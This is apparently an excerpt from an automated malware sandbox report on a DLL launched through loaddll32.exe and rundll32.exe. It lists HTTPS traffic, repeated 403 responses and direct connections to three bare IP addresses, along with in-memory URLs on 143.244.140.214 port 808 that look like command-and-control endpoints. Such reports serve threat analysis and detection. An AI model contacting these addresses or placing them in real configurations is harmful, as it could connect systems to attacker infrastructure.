                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:06:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:07:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:08:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:09:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:03 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:10:03 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: rundll32.exe, 00000003.00000003.800119859.0000000005151000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799281472.000000000514F000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?75268022b6a29
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/c
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.855700484.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.816913953.000000000142C000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/%
                      Source: loaddll32.exe, 00000000.00000003.1178896990.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.904619445.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/0
                      Source: loaddll32.exe, 00000000.00000003.816913953.000000000142C000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/1
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/My
                      Source: loaddll32.exe, 00000000.00000003.920743516.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/P
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/S
                      Source: loaddll32.exe, 00000000.00000002.1192983673.000000000142B000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000003.860275635.000000000142A000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/em32
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1045448367.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.860275635.000000000142A000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.1045448367.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l
                      Source: loaddll32.exe, 00000000.00000003.1063082745.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/ll
                      Source: loaddll32.exe, 00000000.00000002.1192983673.000000000142B000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/ll1
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.920743516.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1028569401.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/oft
                      Source: loaddll32.exe, 00000000.00000003.855700484.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/v
                      Source: loaddll32.exe, 00000000.00000003.855700484.000000000142B000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/w
